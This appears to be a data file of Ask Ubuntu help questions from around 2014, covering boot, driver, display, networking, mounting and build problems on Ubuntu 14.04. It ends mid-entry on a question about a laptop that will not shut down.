518263	ls command not working in ubuntu 14.04	i was trying to use ls command in my ubuntu 14.04 but it keeps on showing the following error , ls : unrecognized option ' -- color=auto' busybox v1.21.1 ( ubuntu 1:1.21.0-1ubuntu1 ) multi-call binary . usage : ls [ -1aacxdlhlinsehrsxvctu ] [ -w width ] [ file ] ... any help on it would be appreciated .
518266	how can i stop being prompted to unlock the 'default ' keyring on boot ? found a solution	this was posted i found a solution simple really just go into keyring and passwords and delete login password it will simply replace the deleted one with your password seems like it should have done that by itself in favor of the new matrix where have i heard that before but long story short i stopped getting that pesky window asking for my password which i did not know since it was put in the iso before i got it now other things work too since that was a road block .
518268	how to install ubuntu 14.0.1 inside/alongside windows 8.1 preinstalled laptop ?	i have purchased a new laptop with windows 8.1 preinstalled . i want to use ubuntu 14.0.1 on my laptop without uninstalling windows . i have created bootable usb stick for installing ubuntu . but when i open wubi.exe install inside windows option is not there . is there something like you ca n't install ubuntu 14.0.1 inside windows ? if not , then how do i accomplish this task ?
518270	for old pcs ... could we install ubuntu 10.04 lts even is in its end of life ?	hello tuxs , in fact i 'm a newbie at ubuntu and i have an old desktop pc pentium 4 with 1gig of ram . and it 's really suck with xp or even with ubuntu 12.04 and exactly when i want to watch videos or films , i thought to install an old distro of ubuntu maybe it will make it more better ... . so i installed ubuntu 11.10 but i was shocked with no updates then i understood that this in it 's end of life distro . so i searched a little bit , i got that 10.04 is lts but this is also in its end of life . my questions are : if i installed the ubuntu 10.04 how it gon na be it will work normally or i will get problems ? sometimes i think this a hardware problem i think a pentium 4 with 1gig of ram does n't suck on youtube or during watching a movie ? ? finally ; ) thank you very much for this beautiful community , that makes me more confident as a newbie .
518271	problem during the usage of up and down keys for checking up and down arrows	i am facing an issue during the usage of up and down on gnome-terminal . lets say my previous commands are vi pos_of_rightmost_setbit.cpp gcc -o harsha pos_of_rightmost_setbit.cpp at this point when i press a up arrow , i see last previous command gcc -o harsha pos_of_rightmost_setbit.cpp which is perfect . but when i hit up arrow again , i have to see last but one previous command which is vi pos_of_rightmost_setbit.cpp , instead i am seeing gcc -o harvightmost_setbit.cpp . when i hit enter at this point of time , the command vi pos_of_rightmost_setbit.cpp is working fine , so i think there some problems with bashrc settings . i am attaching screenshots for better understanding .
518273	gnome 14.04 64-bit : hdmi resolution 1920x1080 but displayed as 640x480	i just did a fresh install of ubuntu gnome 14.04 64 bit . during the installation i had my 22 '' screen attached to it and the image looked good and no problems at all . problem i connected my tv with hdmi to my pc but ( so just single monitor ) the image is way to large . it displays like the resolution is set to 640x480 . and even the tv show in the corner that it was actually displaying that resolution . so i tried to change it , but the resolution was already set to 1920x1080 . when i set it to a lower resolution the image became even bigger . when i did a reboot the issue remains and the tv even now says that it is displaying at 1920x1080 . the weird thing is that when i open firefox and i browse a website , the tex is really tiny like it is when the monitor does display 1920x1080 research so i switched the xorg display driver to a nvidia one , still the same . before i did the fresh install , the same pc was connected to the same tv with ubuntu unity , had resolution issues as well , but not like this switched to lighdm displaymanager , no difference . screenshot as you can see the settings windows is extremly large , but the resolution is set to 1920x1080.. can you guys help me out ?
518276	no options of installation type when installing ubuntu 14.04	my computer is dell l521x with win 8.1 . i want to install ubuntu alongside with win 8.1 . before installation , i 've disabled intel速 rapid start technology and change the boot option to legacy . but , at the step of installation types , there is no option . on the gparted , i could see the normal partition . what 's wrong with it ?
518279	hide all kernel boot messages/logging when disabling splash screen lubuntu 14.04.1	in lubuntu 13.10 i was able to redirect the kernel messages/logging to another tty by adding the following to the grub file in order to hide all kernel boot messages when disabling the splash screen and it booted very quickly : grub_cmdline_linux= '' console=tty12 '' however when i add the same line to grub in lubuntu 14.04.1 i still get all of the boot/logging messages , which actually is taking much longer to boot than having the splash screen present . is there a way to hide all the boot messages applicable to lubuntu 14.04.1 , as it appears redirecting the kernel messages to another tty is n't working . any assistance would be greatly appreciated . thank you ! edit ( regarding marus ' answer ) : yes , after i added the new parameter and deleted `` splash '' i did run sudo update-grub and the new parameter was present after updating and also after re-booting and splash was not present . yes i did delete `` splash '' and kept `` quiet '' . i still receive a whole screen worth of boot/logging messages . i also tried console=tty6 and console=tty9 and neither worked . i still receive boot messages . the only way to not receive boot messages is to re-add `` splash '' .
518282	can not access hotspot internet , after intstalling data card	i have been using iphone hotspot very long time and it was working fine . recently i started using airtel data card 3g , after lot of going through tutorials and instructions i was able to install it and use it to access internet , but the i observed that my iphone hotspot does not work on ubuntu anymore , it shows connected but cant access it from browser . however using a virtual machine , on same system , and bridged connection i am able to access internet from virtual system . connecting to other network works fine , except this iphone hotspot via usb .
518283	not able to install 14.04 from dvd	i have downloaded iso image of ubuntu 14.04 from the official website . after that i burned it on a dvd , when i boot my computer with the dvd inserted in the drive i see the following messages on a black screen : i do not know how to deal with them .
518285	wifi not displayed after rebooting router	i am having a problem that if my router is rebooted , while i am working on my ubuntu 14.04 , then it does not connects again to that same network , neither it shows me the name of my network in connections . the problem automatically get solved in 1 or 2 days . but it does n't work before that . can anyone tell me how to fix it ?
518287	how to get a list of applications installed in ubuntu dash ?	in gnome , we have applications grouped up based on their type ( like - games , accessories , et al ) . but in unity , we need to manually type in the unity to get the app . is there any keyword/utility to display the applications in gui ? ubuntu version : 14.04 hardware : dell inspiron 3437
518289	what is the safest way to stay current on 12.04 or 14.04 , on dual boot with windows 8 ?	i am using 12.04 lts , 64bit for a while now , update manager has been telling me that new hardware support is available . when that first happened , i of course tried to install it , but encountered errors and did not install . i observed other users report the same problems here , but they were told they had selected to receive updates that were n't necessarily ready . ( i forget the exact words , but i checked , and i had not made such a selection either ) . i also briefly attempted upgrading , which was recommended to others as a possible alternative , but i received errors ( now long forgotten ) which prevented me from even starting the process . due to this strange behavior , i have ignored the more recent `` new ubuntu release '' message in update manager . of additional concern , i read here that it is not uncommon for people with dual-boot ( such as i have ) to erase their entire hard drive , because the upgrade process ( just as the original install of 12.04 ) is failing to detect the windows 8 installation , or perhaps other data partitions . so now i 'm quite paranoid of upgrading . what is the safest option for me to continue using 12.04 , or 14.04 , and receive all the important updates , without putting other data on my drive at risk ?
518292	has anybody been able to install acestream on ubuntu 14.04 32bit ?	i 'm trying to follow the instructions on wiziwig.eu but i ca n't find the dependency packages python2.7-apsw and so forth ...
518294	ubuntu 14.04 amd dual graphics 8650g / 8670m	i have a hp pavillion laptop running ubuntu 14.04 lts . it has an amd apu with integrated 8650g and a discrete amd 8670m gpus . ajith @ soulcube : ~ $ uname -a linux soulcube 3.13.0-34-generic # 60-ubuntu smp wed aug 13 15:45:27 utc 2014 x86_64 x86_64 x86_64 gnu/linux ajith @ soulcube : ~ $ i am using the fglrx driver installed using the 'additional drivers ' tool i have read that the dual graphics will switch back and forth between the igpu and the dgpu according to workload , but my laptop seems to be not doing that . i had tried fglrxinfo but it only shows the igpu and does not list the dgpu . ajith @ soulcube : ~ $ fglrxinfo display : :0 screen : 0 opengl vendor string : advanced micro devices , inc. opengl renderer string : amd radeon hd 8650g opengl version string : 4.3.12798 compatibility profile context 13.35.1005 ajith @ soulcube : ~ $ when i tried lspci | grep radeon i got the following ajith @ soulcube : ~ $ lspci | grep radeon 00:01.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] richland [ radeon hd 8650g ] 01:00.0 display controller : advanced micro devices , inc. [ amd/ati ] sun xt [ radeon hd 8670a/8670m/8690m ] ajith @ soulcube : ~ $ i am curious as to why the dgpu is listed as a display controller and not a vga compatible controller . a lot of the posts i have seen on the internet indicate that both of them should turn up as a vga compatible controller . can somebody help me understand the issue and help me switch permanently to using my discrete gpu . i have checked the bios for options pertaining to this but they are not available .
518296	creating a repo with git ( or any version control )	i have all my code/projects as repos in github . i use git a lot , i do have few projects which i can not push to github at the same time , i want to keep a backup on my external hard drive , is there any existing software where you can turn your external harddrive into a repo where i can just git push and the code gets pushed to the repo on my harddrive ? this makes it really easy to push when you are working and keep a backup . simple put , git hub locally on a harddrive . thats it . if it does not exist , how to get started on this and write my own software ? give your insights .
518297	installing ubuntu 14.04.1 lts from usb on an uefi system stops in grub rescue shell - how to continue ?	i want to install ubuntu 14.04.1 from usb on a system with uefi ( from hp ) instead of bios where windows 7 is preinstalled . unfortunately booting from usb-stick hangs at the grub `` rescue shell '' with the following behavior : the prompt is visible and keyboard input is possible the visible screen shows only half of what grub things that the screen is big the clear command only makes the prompt restart from the top of the screen but does not clear anything i have disabled `` secure boot '' in uefi , actually it was disabled from the start . how can i start the ubuntu installer from the rescue shell ? why did n't it start on its own ? ( i have installed many ubuntu 's , also one 14.04 , and never saw such a problem )
518299	file upload dialogue does n't include bookmarks for home , documents , downloads , etc - only custom ones i made myself	when using the file manager normally to browse files , i can see both the places ( which includes default bookmarks for home , documents , and others ) , and bookmarks - which includes my custom bookmarks , which i can also see when i press ctrl+b . here 's what it looks like : it 's easy and quick to navigate around . however , when using the file manager to upload files in firefox - it has a different layout , and does n't include the places section , only my custom bookmarks . that makes it harder to navigate since i almost always want to upload from there . here 's how that looks like : is it possible to include the places section in the file upload dialogue in firefox ?
518304	ca n't mount ntfs partition : operation not permitted	error mounting /dev/sda5 at /media/abhishek/entertainment : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda5 '' `` /media/abhishek/entertainment '' ' exited with non-zero exit status 14 : the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sda5 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option .
518305	laptop sees two connections when hd tv is plugged , but no image	with apple macbook air 1,1 ( early 2008 ) and ubuntu 12.04 with kernel linux 3.2.0-68-generic-pae , when i connect it to an hd tv via the micro-dvi to dvi ( apple adapter ) -- > dvi to hdmi ( i tried two different cables ) i get the tv recognized in system settings - > displays , but the tv only gets a completely black screen signal ( i.e . it gets a signal , because if i unplug the cable or disable the tv screen in ubuntu the tv then says 'no signal ' , but this signal is just black screen ) . note that the dvi adapter works well with other dvi screens in linux , while the above hdmi setup works well in windows , so it must be a linux-related problem . the tv is philips 32pfl4007m/08 but in system settings - > displays it gets named philips consumer electronics 58 '' the problem should be that the graphics chipset is reporting a single device being connected to both hdmi and tv1 , as one can check in the output from xrandr ( with cable plugged in ) : screen 0 : minimum 320 x 200 , current 3200 x 1080 , maximum 8192 x 8192 lvds1 connected 1280x800+0+12 ( normal left inverted right x axis y axis ) 286mm x 179mm 1280x800 61.2*+ 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) hdmi1 connected 1920x1080+1280+0 ( normal left inverted right x axis y axis ) 1280mm x 720mm 1920x1080 60.0*+ 50.0 24.0 1600x1200 60.0 1280x1024 60.0 1360x768 59.8 1024x768 60.0 800x600 60.3 640x480 60.0 tv1 unknown connection ( normal left inverted right x axis y axis ) 848x480 59.9 + 640x480 59.9 + 1024x768 59.9 800x600 59.9 the command lsmod | grep i915 gives i915 428317 4 drm_kms_helper 45466 1 i915 drm 197641 5 i915 , drm_kms_helper i2c_algo_bit 13199 1 i915 video 19115 1 i915 with lspci i get intel corporation mobile gm965/gl960 integrated graphics controller also 00:02.0 vga compatible controller : intel corporation mobile gm965/gl960 integrated graphics controller ( primary ) ( rev 03 ) ( prog-if 00 [ vga controller ] ) subsystem : apple inc. device 00a2 flags : bus master , fast devsel , latency 0 , irq 42 memory at 90000000 ( 64-bit , non-prefetchable ) [ size=1m ] memory at 80000000 ( 64-bit , prefetchable ) [ size=256m ] i/o ports at 5110 [ size=8 ] expansion rom at < unassigned > [ disabled ] capabilities : < access denied > kernel driver in use : i915 kernel modules : intelfb , i915 00:02.1 display controller : intel corporation mobile gm965/gl960 integrated graphics controller ( secondary ) ( rev 03 ) subsystem : apple inc. device 00a2 flags : bus master , fast devsel , latency 0 memory at 90100000 ( 64-bit , non-prefetchable ) [ size=1m ] capabilities : < access denied > and sudo lshw -c display gives *-display:0 description : vga compatible controller product : mobile gm965/gl960 integrated graphics controller ( primary ) vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 03 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:42 memory:90000000-900fffff memory:80000000-8fffffff ioport:5110 ( size=8 ) *-display:1 unclaimed description : display controller product : mobile gm965/gl960 integrated graphics controller ( secondary ) vendor : intel corporation physical id : 2.1 bus info : pci @ 0000:00:02.1 version : 03 width : 64 bits clock : 33mhz capabilities : pm bus_master cap_list configuration : latency=0 resources : memory:90100000-901fffff and randr -- prop gives screen 0 : minimum 320 x 200 , current 3200 x 1080 , maximum 8192 x 8192 lvds1 connected 1280x800+0+0 ( normal left inverted right x axis y axis ) 286mm x 179mm edid : 00ffffffffffff000610739c01010101 10110103801d12780a90b59958528e26 1e505400000001010101010101010101 010101010101521c00a0502017303020 36001eb3100000180000000100061020 00000000000000000a20000000fe0042 313333455730332056300a20000000fe 00436f6c6f72204c43440a20202000d4 backlight : 3906 ( 0x00000f42 ) range : ( 0,24385 ) backlight : 3906 ( 0x00000f42 ) range : ( 0,24385 ) scaling mode : full aspect supported : none full center full aspect 1280x800 61.2*+ 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) hdmi1 connected 1920x1080+1280+0 ( normal left inverted right x axis y axis ) 1280mm x 720mm edid : 00ffffffffffff00410c000001010101 03140103808048780ae692a3544a9926 0f4a4c2108008bc08180a94001010101 010101010101023a801871382d40582c 450000d05200001e023a80d072382d40 102c458000d05200001e000000fc0050 68696c697073204654560a20000000fd 00303e0f4611000a20202020202001c9 020331f152101f202221051404131203 1102160715060126091f071507508301 00006a030c003000382d802e2ee30503 01011d803e73382d407e2c458000d052 00001e011d80d0721c1620102c258000 d05200009e011d00bc52d01e20b82855 4000d05200001e011d8018711c162058 2c250000d05200009e00000000000002 broadcast rgb : full supported : full limited 16:2 audio : auto supported : off auto on 1920x1080 60.0*+ 50.0 24.0 1600x1200 60.0 1280x1024 60.0 1360x768 59.8 1024x768 60.0 800x600 60.3 640x480 60.0 tv1 unknown connection ( normal left inverted right x axis y axis ) bottom margin : 37 ( 0x00000025 ) range : ( 0,100 ) right margin : 46 ( 0x0000002e ) range : ( 0,100 ) top margin : 36 ( 0x00000024 ) range : ( 0,100 ) left margin : 54 ( 0x00000036 ) range : ( 0,100 ) mode : ntsc-m supported : ntsc-m ntsc-443 ntsc-j pal-m pal-n pal 480p @ 59.94hz 480p @ 60hz 576p 720p @ 60hz 720p @ 59.94hz 720p @ 50hz 1080i @ 50hz 1080i @ 60hz 1080i @ 59.94h 848x480 59.9 + 640x480 59.9 + 1024x768 59.9 800x600 59.9
518307	enable vibration on receiving calls ubuntu touch	how can i enable vibration on receiving calls in ubuntu touch . i have the latest stable version installed in my nexus 4 . but it did n't have an option to enable the same in settings or anywhere . i found this link but did n't helped . https : //bugs.launchpad.net/ubuntu-system-settings/+bug/1232350
518308	unable to start kubuntu after updating from 13.10 to 14.04	i 'm not sure if this is the right place to ask a question about kubuntu . please feel free to suggest me a better place to ask this question . i 'm running dual boot windows 7 and kubuntu . today after i run the update manager in kubuntu to update from 13.10 to 14.04 , kubuntu does n't boot into the desktop anymore . in the boot menu , all options now show ubuntu instead of kubuntu . the only way i can get to the kubuntu desktop now is to choose the option `` ubuntu with linux 3.15.xx ( recovery mode ) '' , then choose `` enable network '' , and press ctrl+c . please tell me how to fix this . thank you .
518309	compiling the latest kvm with kvm-kmod from git repositories under ubuntu 14.04 64-bit	i am trying to run os x mavericks as a vm under qemu/kvm in ubuntu 14.04 64-bit . the guide i 'm following for this is here : http : //blog.definedcode.com/osx-qemu-kvm also note i 'm doing this on a clean install of ubuntu 14.04 64-bit and downloaded some packages after the installation completed which also included qemu-kvm from apt-get . i had been using an ubuntu vm on that just to try kvm out . i 'm using my actual system to build kvm/kvm-kmod , not the vm . according to the guide i 'm following i need to build the latest source code for kvm/kvm-kmod from the git repositories since the patches for os x are not shipped with kvm that is in the latest apt or yum repositories . the two repositories being used are : git : //git.kernel.org/pub/scm/virt/kvm/kvm.git git : //git.kiszka.org/kvm-kmod.git the guide ( blog post ) is not very old and is dated 4th june 2014 . i 'm mentioning the date because the person who wrote that blog post was able to compile the latest code at that point . i , however , am not able to build the code ( on the master branches of both the repositories ) and am getting a compilation error . here 's the output from my terminal : mubeeniqbal @ m17xr3 : ~/desktop/kvm-build/kvm $ git status on branch master your branch is up-to-date with 'origin/master ' . nothing to commit , working directory clean mubeeniqbal @ m17xr3 : ~/desktop/kvm-build/kvm $ cd ../kvm-kmod/ mubeeniqbal @ m17xr3 : ~/desktop/kvm-build/kvm-kmod $ git status on branch master your branch is up-to-date with 'origin/master ' . nothing to commit , working directory clean mubeeniqbal @ m17xr3 : ~/desktop/kvm-build/kvm-kmod $ ./configure mubeeniqbal @ m17xr3 : ~/desktop/kvm-build/kvm-kmod $ sudo make linux=../kvm clean sync all [ sudo ] password for mubeeniqbal : make -c /lib/modules/3.13.0-35-generic/build m=`pwd` clean make [ 1 ] : entering directory `/usr/src/linux-headers-3.13.0-35-generic' make [ 1 ] : leaving directory `/usr/src/linux-headers-3.13.0-35-generic' ./sync -v for-linus-6-g8d68f67 -l ../kvm make -c /lib/modules/3.13.0-35-generic/build m=`pwd` \ linuxinclude= '' -i`pwd`/include -i`pwd`/include/uapi -iinclude \ -iinclude/uapi -iarch/x86/include -iarch/x86/include/uapi \ -iinclude/generated/uapi -iarch/x86/include/generated \ -iarch/x86/include/generated/uapi \ -i`pwd`/include-compat -i`pwd`/x86 \ -include include/generated/autoconf.h \ -include `pwd`/x86/external-module-compat.h '' \ `` $ @ '' make [ 1 ] : entering directory `/usr/src/linux-headers-3.13.0-35-generic' ld /home/mubeeniqbal/desktop/kvm-build/kvm-kmod/x86/built-in.o cc [ m ] /home/mubeeniqbal/desktop/kvm-build/kvm-kmod/x86/svm.o cc [ m ] /home/mubeeniqbal/desktop/kvm-build/kvm-kmod/x86/vmx.o cc [ m ] /home/mubeeniqbal/desktop/kvm-build/kvm-kmod/x86/kvm_main.o cc [ m ] /home/mubeeniqbal/desktop/kvm-build/kvm-kmod/x86/x86.o in file included from include/linux/timer.h:5:0 , from include/linux/workqueue.h:8 , from include/linux/kobject.h:29 , from include/linux/device.h:17 , from include/linux/node.h:17 , from include/linux/cpu.h:16 , from /home/mubeeniqbal/desktop/kvm-build/kvm-kmod/x86/../external-module-compat-comm.h:16 , from /home/mubeeniqbal/desktop/kvm-build/kvm-kmod/x86/external-module-compat.h:45 , from < command-line > :0 : /home/mubeeniqbal/desktop/kvm-build/kvm-kmod/x86/x86.c : in function ‘update_pvclock_gtod’ : /home/mubeeniqbal/desktop/kvm-build/kvm-kmod/x86/x86.c:1080:36 : error : ‘struct timekeeper’ has no member named ‘tkr’ boot_ns = ktime_to_ns ( ktime_add ( tk- > tkr.base_mono , tk- > offs_boot ) ) ; ^ include/linux/ktime.h:124:29 : note : in definition of macro ‘ktime_to_ns’ # define ktime_to_ns ( kt ) ( ( kt ) .tv64 ) ^ /home/mubeeniqbal/desktop/kvm-build/kvm-kmod/x86/x86.c:1080:24 : note : in expansion of macro ‘ktime_add’ boot_ns = ktime_to_ns ( ktime_add ( tk- > tkr.base_mono , tk- > offs_boot ) ) ; ^ /home/mubeeniqbal/desktop/kvm-build/kvm-kmod/x86/x86.c:1085:31 : error : ‘struct timekeeper’ has no member named ‘tkr’ vdata- > clock.vclock_mode = tk- > tkr.clock- > archdata.vclock_mode ; ^ /home/mubeeniqbal/desktop/kvm-build/kvm-kmod/x86/x86.c:1086:31 : error : ‘struct timekeeper’ has no member named ‘tkr’ vdata- > clock.cycle_last = tk- > tkr.cycle_last ; ^ /home/mubeeniqbal/desktop/kvm-build/kvm-kmod/x86/x86.c:1087:25 : error : ‘struct timekeeper’ has no member named ‘tkr’ vdata- > clock.mask = tk- > tkr.mask ; ^ /home/mubeeniqbal/desktop/kvm-build/kvm-kmod/x86/x86.c:1088:25 : error : ‘struct timekeeper’ has no member named ‘tkr’ vdata- > clock.mult = tk- > tkr.mult ; ^ /home/mubeeniqbal/desktop/kvm-build/kvm-kmod/x86/x86.c:1089:26 : error : ‘struct timekeeper’ has no member named ‘tkr’ vdata- > clock.shift = tk- > tkr.shift ; ^ /home/mubeeniqbal/desktop/kvm-build/kvm-kmod/x86/x86.c:1092:24 : error : ‘struct timekeeper’ has no member named ‘tkr’ vdata- > nsec_base = tk- > tkr.xtime_nsec ; ^ /home/mubeeniqbal/desktop/kvm-build/kvm-kmod/x86/x86.c : in function ‘get_kernel_ns’ : /home/mubeeniqbal/desktop/kvm-build/kvm-kmod/x86/x86.c:1188:2 : error : implicit declaration of function ‘ktime_get_boot_ns’ [ -werror=implicit-function-declaration ] return ktime_get_boot_ns ( ) ; ^ cc1 : some warnings being treated as errors make [ 3 ] : *** [ /home/mubeeniqbal/desktop/kvm-build/kvm-kmod/x86/x86.o ] error 1 make [ 2 ] : *** [ /home/mubeeniqbal/desktop/kvm-build/kvm-kmod/x86 ] error 2 make [ 1 ] : *** [ _module_/home/mubeeniqbal/desktop/kvm-build/kvm-kmod ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.13.0-35-generic' make : *** [ all ] error 2 mubeeniqbal @ m17xr3 : ~/desktop/kvm-build/kvm-kmod $ i have also noticed that the build bot ( http : //buildbot.kiszka.org/kvm-kmod/ ) is failing to build the code now . see here : http : //buildbot.kiszka.org/kvm-kmod/grid and here : http : //buildbot.kiszka.org/kvm-kmod/builders after reading the output it seemed to me that the error might be related to some header files not being found . so i googled for the issue and came across this ( https : //github.com/cloudbees/kvm-kmod ) git repository on github . while going through their commit messages i came across some changes they 'd made to the makefile . the commit message read : making the include header resolution work . in my /lib/modules/3.9.7-1-arch/build area , there 's no directory that has 'generated ' in its name . for example , instead of include/generated/uapi , i have include/uapi , and so on . i could be wrong on this , but this looks like the cause of the compilation error . here 's the link to that commit : https : //github.com/cloudbees/kvm-kmod/commit/eedb6fbac72e03c33c543d493716928b122fbd23 i made the same changes to my own makefile and after that all syntax errors went away . but i still got a fatal error from gcc complaining about `` no input files '' . here 's the output from the terminal : mubeeniqbal @ m17xr3 : ~/desktop/kvm-build/kvm-kmod $ ./configure mubeeniqbal @ m17xr3 : ~/desktop/kvm-build/kvm-kmod $ sudo make linux=../kvm clean sync all [ sudo ] password for mubeeniqbal : make -c /lib/modules/3.13.0-35-generic/build m=`pwd` clean make [ 1 ] : entering directory `/usr/src/linux-headers-3.13.0-35-generic' clean /home/mubeeniqbal/desktop/kvm-build/kvm-kmod/.tmp_versions make [ 1 ] : leaving directory `/usr/src/linux-headers-3.13.0-35-generic' ./sync -v for-linus-6-g8d68f67 -l ../kvm make -c /lib/modules/3.13.0-35-generic/build m=`pwd` \ linuxinclude= '' -i`pwd`/include -i`pwd`/include/uapi -iinclude \ -iinclude/uapi -iarch/x86/include -iarch/x86/include/uapi \ # -iinclude/generated/uapi -iarch/x86/include/generated \ -iinclude/generated/uapi -iinclude/uapi \ -iarch/x86/include/generated -iarch/x86/include \ -iarch/x86/include/generated/uapi \ -iarch/x86/include/uapi \ -i`pwd`/include-compat -i`pwd`/x86 \ -include include/generated/autoconf.h \ -include `pwd`/x86/external-module-compat.h '' \ `` $ @ '' make [ 1 ] : entering directory `/usr/src/linux-headers-3.13.0-35-generic' ld /home/mubeeniqbal/desktop/kvm-build/kvm-kmod/x86/built-in.o cc [ m ] /home/mubeeniqbal/desktop/kvm-build/kvm-kmod/x86/svm.o gcc : fatal error : no input files compilation terminated . make [ 3 ] : *** [ /home/mubeeniqbal/desktop/kvm-build/kvm-kmod/x86/svm.o ] error 4 make [ 2 ] : *** [ /home/mubeeniqbal/desktop/kvm-build/kvm-kmod/x86 ] error 2 make [ 1 ] : *** [ _module_/home/mubeeniqbal/desktop/kvm-build/kvm-kmod ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.13.0-35-generic' make : *** [ all ] error 2 mubeeniqbal @ m17xr3 : ~/desktop/kvm-build/kvm-kmod $ i really want to run an os x mavericks as a vm using qemu/kvm . any help on building the sources from git will be really appreciated . ps : i own a macbook pro so it 's ( or might be ) legal for me to run an os x vm on that . ; ) however , right now i 'm using a pc with an x86_64 processor and ubuntu 14.04 64-bit on it to build the code . sorry i had to quote some of the hyper links inline since my reputation is less than 10 and i ca n't use more than 2 hyper links in my questions .
518311	ntfs config and startup mounting	i have installed xubuntu 14.04 64bit version . and then i have installed ntfs config . but at that time my external storage ( hdd ) was connected with my laptop . then i have restarted my laptop but that time i disconnected my external storage . and this is the problem that in the time of start-up this os is giving message `` the storage is not ready or ca n't mount . wait to continue s to skip , m to manual config '' like that . but i do n't want this message to show me and the os to check the external device and to mount . please help me .
518317	dual booting ubuntu 12.04 and 14.04 [ same drive ]	i want to install ubuntu 12.04 and 14.04 on the same drive . i have already installed ubuntu 12.04 and i have manually partitioned the drive . 300 mb boot ; 20 gb root ; 400 gb home ; 5gb swap 500 gb is unpartitoned . ( left for 14.04 ) now i want to install 14.04 . how do i go about partitioning the remaining 500 gb for 14.04 . i will create another home and root partition , but do i also have to create another boot partition ? i do n't want to have any grub issues . i just want both the installation to be separate and neat .
518321	why does my mts mblaze data card keep disconnecting in ubuntu14.04 from time to time ? ? plz help me solve this problem	i am a newbie to linux . i use ubuntu 14.04 . i also use mts mblaze data card to access the internet . my data card gets recognised very well by ubuntu and i get to connect to the internet hassle free . there 's absolutely no problem in it . but it keeps on getting disconnected from time to time . then i have to take my dongle out of my usb and then reinsert it and then again try to connect to successfully connect to the internet . it will work for sometime with no problems and then again disconnect . i used windows earlier and there was no such problem with the same data card . in fact , in windows it worked absolutely fine with no problem . also i want to know that in windows my data card showed a ui when it started and i had to connect using that ui . but in ubuntu it does n't show any ui and i have to connect using ubuntu 's interface . why is that so ? ? plz help me with my problem .
518322	dual boot windows 7 ubuntu and clock	i have installed ubuntu on my laptop alongside windows 7 . but for a reason i do n't know there is a problem with the clock of my computer . when i use ubuntu and i restart the computer to go on windows 7 , the clock is 2 hours too late . it is a small detail but i would like to understand why it does that .
518323	can i delete ktorrent *.dnd files ?	i 've noticed that *.dnd files in ~/.kde/share/apps/ktorrent consumed 8 gb of disk space . as i understand , dnd means `` do not download '' - > just temp files ? would n't ktorrent recreate/redownload it after deletion ? is it safe to delete these files ? wo n't it affect my active torrents ?
518325	problem installing mysql workbench in ubuntu 14.04 lts	while installing mysql workbench in ubuntu 14.04 lts from ubuntu software center , while applying changes phase i got the following error.. please suggest me what should i do.. package operation failed .. installarchives ( ) failed : ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 285253 files and directories currently installed . ) preparing to unpack ... /mysql-workbench-data_6.0.8+dfsg-2_all.deb ... unpacking mysql-workbench-data ( 6.0.8+dfsg-2 ) ... dpkg : error processing archive /var/cache/apt/archives/mysql-workbench-data_6.0.8+dfsg-2_all.deb ( -- unpack ) : trying to overwrite '/usr/share/icons/hicolor/128x128/mimetypes/application-vnd.mysql-workbench-plugin.png ' , which is also in package mysql-workbench-community 6.1.7-1ubu1404 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) preparing to unpack ... /mysql-workbench_6.0.8+dfsg-2_amd64.deb ... unpacking mysql-workbench ( 6.0.8+dfsg-2 ) ... dpkg : error processing archive /var/cache/apt/archives/mysql-workbench_6.0.8+dfsg-2_amd64.deb ( -- unpack ) : trying to overwrite '/usr/lib/mysql-workbench/libantlr3c_wb.so ' , which is also in package mysql-workbench-community 6.1.7-1ubu1404 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) processing triggers for hicolor-icon-theme ( 0.13-1 ) ... processing triggers for mime-support ( 3.54ubuntu1 ) ... errors were encountered while processing : /var/cache/apt/archives/mysql-workbench-data_6.0.8+dfsg-2_all.deb /var/cache/apt/archives/mysql-workbench_6.0.8+dfsg-2_amd64.deb error in function :
518326	apache virtual hosts on ubuntu not working	i have created virtual hosts on amazon instance ec2 by following this tutorial how-to-set-up-apache-virtual-hosts-on-ubuntu-14-04-lts i also created 111.111.111.111 example.com on my windows hosts file . the issue is that . domain still open default directory not that i had created by following the tutorial it should show content from /var/www/example.com/public_html but it does not , please help me what wrong i 'm doing
518328	which nvidia driver to install ?	i am having issues with the current nvidia driver and i wanted to install new one using synaptic drivers tool . i got a list of updated drivers and all of them seems ok . which one to install ? take a look at the snapshot . i am not sure whether to install 1st , 3rd or 5th drivers ?
518330	ubuntu wo n't let me shutdown	i can use my laptop with out any problem for a while ( sometimes around 12 hours and sometimes just half an hour ) , then suddenly one by one , the applications will be closed . i ca n't shutdown . so i get trapped in a state where i ca n't open any application and ca n't shutdown . example situation i was working on laptop . i had rythmbox , firefox , codeblocks , notepad , files and terminal open . suddenly , notepad wo n't save any more . so i closed it . then the text file wo n't open any more . i realized what 's happening , but i continued working so that i can use the situation to write a question here . after a while , the music stopped . then firefox closed . tried opening it again , but nothing happened . tried to shutdown by pressing the button on the upper right corner of screen . it 's suppose to show a drop down menu , but nothing appears . so ca n't shutdown through this . i opened the terminal . typed `` sudo poweroff '' , and it showed `` command not found : input/output error '' . next i closed the lid of my laptop so that it sleeps . i opened the lid to find that i have been logged out . tried to shutdown from the upper corner button , but the drop 